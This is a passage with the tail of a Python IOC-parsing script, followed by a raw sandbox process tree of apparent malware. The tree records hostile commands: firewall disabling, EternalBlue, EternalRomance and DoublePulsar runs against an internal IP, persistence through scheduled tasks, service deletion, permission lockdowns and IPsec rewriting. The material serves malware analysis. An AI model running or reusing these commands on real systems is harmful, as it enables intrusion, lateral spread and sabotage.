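    """Sorted, de-duplicated file-system IOCs (descriptions starting with 'File')."""
    return sorted({r["ioc"] for r in rows if r["desc"].startswith("File")})


def ifeo_debugger_hijacks(rows):
    """(target image, debugger) pairs from 'debugger' value writes under
    Image File Execution Options: Windows starts the debugger instead of
    the target, so debugger=taskkill.exe silently blocks the target."""
    marker = "\\Image File Execution Options\\"
    hits = []
    for r in rows:
        ioc = r["ioc"]
        if r["desc"].startswith("Set value") and marker in ioc and "\\debugger = " in ioc:
            target, value = ioc.split(marker, 1)[1].split("\\debugger = ", 1)
            hits.append((target, value.strip('"')))
    return hits


if __name__ == "__main__":
    rows = parse_ioc_rows(SAMPLE_ROWS)
    for proc_desc, n in sorted(by_process(rows).items()):
        print(n, *proc_desc)
    print("files:", touched_files(rows))
    print("IFEO hijacks:", ifeo_debugger_hijacks(rows))
```

The lookahead on the next description is what makes the parser robust to IOCs that themselves end in ".exe" (the IFEO key path, the dropped Fileftp.exe); without it, a lazy match would split "C:\Program Files\Windowsd\Fileftp.exe conhost.exe" at the wrong place. Feed it the full signature section and the same three functions give the complete dropped-file list and per-process activity counts.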
Processes
-
C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe (depth 1)
    "C:\Users\Admin\AppData\Local\Temp\898bbf64f5e0297bdd76cbd9ae5e4b81_JaffaCakes118.exe"
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Windows\SysWOW64\net.exenet stop lanmanserver /y2⤵
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop lanmanserver /y3⤵PID:1292
-
-
-
C:\Windows\SysWOW64\sc.exesc config lanmanserver start= DISABLED 2>nul2⤵PID:2920
-
-
C:\Windows\SysWOW64\sc.exesc delete lanmanserver2⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.02⤵
- Suspicious use of WriteProcessMemory
PID:4788 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.03⤵PID:1876
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.02⤵
- Launches sc.exe
PID:760
-
-
C:\Windows\SysWOW64\net.exenet stop mssecsvc2.12⤵PID:3452
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mssecsvc2.13⤵PID:3824
-
-
-
C:\Windows\SysWOW64\sc.exesc delete mssecsvc2.12⤵
- Launches sc.exe
PID:752
-
-
C:\Windows\SysWOW64\net.exenet stop COMSysCts2⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop COMSysCts3⤵PID:1284
-
-
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts2⤵
- Launches sc.exe
PID:3988
-
-
C:\Windows\SysWOW64\net.exenet stop WmiAppSrv2⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WmiAppSrv3⤵PID:3952
-
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv2⤵PID:1552
-
-
C:\Windows\SysWOW64\net.exenet stop Bcdefg2⤵PID:1252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Bcdefg3⤵PID:4804
-
-
-
C:\Windows\SysWOW64\sc.exesc delete Bcdefg2⤵PID:3972
-
-
C:\Windows\SysWOW64\net.exenet stop WSSDPSRVS2⤵PID:3636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WSSDPSRVS3⤵PID:4896
-
-
-
C:\Windows\SysWOW64\sc.exesc delete SSDPSRVS2⤵PID:3472
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\windows\Installer\conhost.exe2⤵PID:3540
-
C:\windows\Installer\conhost.exeC:\windows\Installer\conhost.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:3340 -
C:\Program Files\Windowsd\Fileftp.exe (depth 4)
    "C:\Program Files\Windowsd\Fileftp.exe"
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:928 -
C:\Windows\SysWOW64\netsh.exe (depth 5)
    netsh firewall set opmode mode=disable
- Modifies Windows Firewall
PID:3728
-
-
C:\Program Files\Windowsd\Eternalblue-2.2.0.exe (depth 5)
    "C:\Program Files\Windowsd\Eternalblue-2.2.0.exe" --TargetIp 10.127.0.88 --Target WIN72K8R2 --logfile log.txt
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5864
-
-
C:\Program Files\Windowsd\Eternalromance-1.4.0.exe (depth 5)
    "C:\Program Files\Windowsd\Eternalromance-1.4.0.exe" --TargetIp 10.127.0.88 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeFile shellcode.bin --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:6472
-
-
C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe (depth 5)
    "C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe" Eternalchampion-2.0.0.exe --TargetIp 10.127.0.88 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeBuffer [...] --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:8040
-
-
C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe (depth 5)
    "C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.88 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll
- Executes dropped EXE
- Loads dropped DLL
PID:5492
-
-
C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe (depth 5)
    "C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.88 --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload x86.dll
- Executes dropped EXE
- Loads dropped DLL
PID:6112
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\inf\demo1.bat2⤵
- Drops file in Drivers directory
PID:4404 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1544
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:4784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4796
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1328
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:1236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4576
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:3080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3020
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:4208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2692
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5428
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:5440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7312
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:7352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7644
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:7656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:7688
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:7696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7716
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:7724
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:7748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:7764
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:7788
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:7804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:7820
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:7840
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:7860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:7880
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:7916
-
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto3⤵
- Launches sc.exe
PID:7944
-
-
C:\Windows\SysWOW64\sc.exesc start Schedule3⤵
- Launches sc.exe
PID:7964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn AutoKMSK /f3⤵PID:7980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Adobe Flash Player Updaters" /f3⤵PID:8008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 15 /tn "AutoKMSK" /tr "C:\windows\Installer\conhost.exe" /ru "system" /f3⤵
- Creates scheduled task(s)
PID:8032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /tn "AutoKMSK"3⤵PID:8064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 35 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f3⤵
- Creates scheduled task(s)
PID:8092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\Drivers\etc\hosts /a3⤵
- Modifies file permissions
PID:8128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8144
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Drivers\etc\hosts /g users:f3⤵PID:8156
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts3⤵
- Views/modifies file attributes
PID:8176
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:7692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7732
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Drivers\etc\hosts /d everyone3⤵PID:7744
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:7772
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\splwow64.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\splwow64.exe /d everyone3⤵PID:4500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im splwow64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7860
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7964
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵PID:7996
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:8016
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\Mysql3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:8080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8096
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\Mysql /d everyone3⤵PID:8092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\Magnify.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:8144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7668
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Magnify.exe /d everyone3⤵PID:8180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sleep.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7692
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sleep.exe /d everyone3⤵PID:4872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "At1" /f3⤵PID:7736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "At2" /f3⤵PID:7744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "\Microsoft\Windows\UPnP\Services" /f3⤵PID:4900
-
-
C:\Windows\SysWOW64\sc.exesc stop EndpointRpc3⤵PID:5084
-
-
C:\Windows\SysWOW64\sc.exesc delete EndpointRpc3⤵PID:4340
-
-
C:\Windows\SysWOW64\sc.exesc stop HEU_KMS_Renewal3⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\SysWOW64\sc.exesc delete HEU_KMS_Renewal3⤵PID:7748
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsaus.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7356
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\system\lsaus.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8184
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system\lsaus.exe /d everyone3⤵PID:7852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsmos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\debug\lsmos.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1268
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\lsmos.exe /d everyone3⤵PID:7884
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Temp\conhost.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:640
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\conhost.exe /d everyone3⤵PID:568
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:7880
-
-
C:\Windows\SysWOW64\sc.exesc stop xWinWpdSrv3⤵
- Launches sc.exe
PID:7892
-
-
C:\Windows\SysWOW64\sc.exesc delete xWinWpdSrv3⤵
- Launches sc.exe
PID:1624
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLService3⤵PID:8116
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLService3⤵
- Launches sc.exe
PID:4488
-
-
C:\Windows\SysWOW64\sc.exesc stop update3⤵
- Launches sc.exe
PID:3024
-
-
C:\Windows\SysWOW64\sc.exesc delete update3⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\SysWOW64\sc.exesc stop Microsoft_Update3⤵
- Launches sc.exe
PID:4332
-
-
C:\Windows\SysWOW64\sc.exesc delete Microsoft_Update3⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\SysWOW64\sc.exesc stop Samserver3⤵
- Launches sc.exe
PID:7960
-
-
C:\Windows\SysWOW64\sc.exesc delete Samserver3⤵
- Launches sc.exe
PID:2544
-
-
C:\Windows\SysWOW64\sc.exesc stop RpcEptManger3⤵
- Launches sc.exe
PID:4548
-
-
C:\Windows\SysWOW64\sc.exesc delete RpcEptManger3⤵
- Launches sc.exe
PID:960
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftFonts3⤵PID:7968
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftFonts3⤵PID:2252
-
-
C:\Windows\SysWOW64\sc.exesc stop WinVMDHCPI3⤵
- Launches sc.exe
PID:2636
-
-
C:\Windows\SysWOW64\sc.exesc delete WinVMDHCPI3⤵PID:7988
-
-
C:\Windows\SysWOW64\sc.exesc stop wmiApServs3⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\SysWOW64\sc.exesc delete wmiApServs3⤵
- Launches sc.exe
PID:776
-
-
C:\Windows\SysWOW64\sc.exesc stop "Windows TrustedInstaller"3⤵
- Launches sc.exe
PID:2932
-
-
C:\Windows\SysWOW64\sc.exesc delete "Windows TrustedInstaller"3⤵PID:4808
-
-
C:\Windows\SysWOW64\sc.exesc stop COMSysCts3⤵
- Launches sc.exe
PID:4396
-
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts3⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\SysWOW64\sc.exesc stop SuperProServer3⤵
- Launches sc.exe
PID:396
-
-
C:\Windows\SysWOW64\sc.exesc delete SuperProServer3⤵
- Launches sc.exe
PID:2160
-
-
C:\Windows\SysWOW64\sc.exesc stop WindosroServert3⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\SysWOW64\sc.exesc delete WindosroServert3⤵
- Launches sc.exe
PID:4072
-
-
C:\Windows\SysWOW64\sc.exesc stop wmiApSrvs3⤵
- Launches sc.exe
PID:3528
-
-
C:\Windows\SysWOW64\sc.exesc delete wmiApSrvs3⤵PID:3832
-
-
C:\Windows\SysWOW64\sc.exesc stop Abrjkb Dumne3⤵
- Launches sc.exe
PID:5636
-
-
C:\Windows\SysWOW64\sc.exesc delete Abrjkb Dumne3⤵PID:7672
-
-
C:\Windows\SysWOW64\sc.exesc stop Defghiback3⤵PID:4320
-
-
C:\Windows\SysWOW64\sc.exesc delete Defghiback3⤵
- Launches sc.exe
PID:1404
-
-
C:\Windows\SysWOW64\sc.exesc stop RpcEpt3⤵
- Launches sc.exe
PID:4864
-
-
C:\Windows\SysWOW64\sc.exesc delete RpcEpt3⤵PID:2348
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
- Launches sc.exe
PID:4084
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMssql3⤵PID:2764
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMssql3⤵
- Launches sc.exe
PID:1416
-
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSrv3⤵PID:556
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv3⤵
- Launches sc.exe
PID:3200
-
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSvr3⤵
- Launches sc.exe
PID:4028
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSvr3⤵PID:4992
-
-
C:\Windows\SysWOW64\sc.exesc stop Framework3⤵
- Launches sc.exe
PID:8056
-
-
C:\Windows\SysWOW64\sc.exesc delete Framework3⤵
- Launches sc.exe
PID:8080
-
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵PID:8108
-
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_643⤵
- Launches sc.exe
PID:8140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8176
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\tasksche.exe" /d everyone3⤵PID:3532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4284
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSrv\svchost.exe" /d everyone3⤵PID:4276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSvr\svchost.exe" /d everyone3⤵PID:7724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4448
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiApprsv\svchost.exe" /d everyone3⤵PID:4644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSrv\csrss.exe" /d everyone3⤵PID:4900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3824
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe" /d everyone3⤵PID:4340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7764
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiAppSvr\csrss.exe" /d everyone3⤵PID:1544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4784
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiApprsv\csrss.exe" /d everyone3⤵PID:1116
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiappsrv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:7612
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:8184
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:7880
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSvr\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:4792
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\programdata\\wmiapprsv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:2344
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:4932
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:900
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppSvr\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5296
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\WmiAppRsv\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5328
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='tasksche.exe' and ExecutablePath='C:\\Windows\\tasksche.exe'" call Terminate3⤵
- Kills process with WMI
PID:3212
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5364
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe"3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5396
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe" /d everyone3⤵PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7776
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\csrss.exe" /d everyone3⤵PID:7724
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\clr_optimization_v4.0.30318_64\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
PID:5464
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\clr_optimization_v4.0.30318_64\\csrss.exe'" call Terminate3⤵
- Kills process with WMI
PID:5544
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im boy.exe3⤵
- Kills process with taskkill
PID:6508
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\boy.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:6472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:6456
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\boy.exe /d everyone3⤵PID:6448
-
-
C:\Windows\SysWOW64\sc.exesc start PolicyAgent3⤵
- Launches sc.exe
PID:3208
-
-
C:\Windows\SysWOW64\sc.exesc config PolicyAgent start= AUTO3⤵PID:6556
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all3⤵PID:6576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Aliyun3⤵PID:6628
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Allowlist3⤵PID:7392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=denylist3⤵PID:1660
-
-
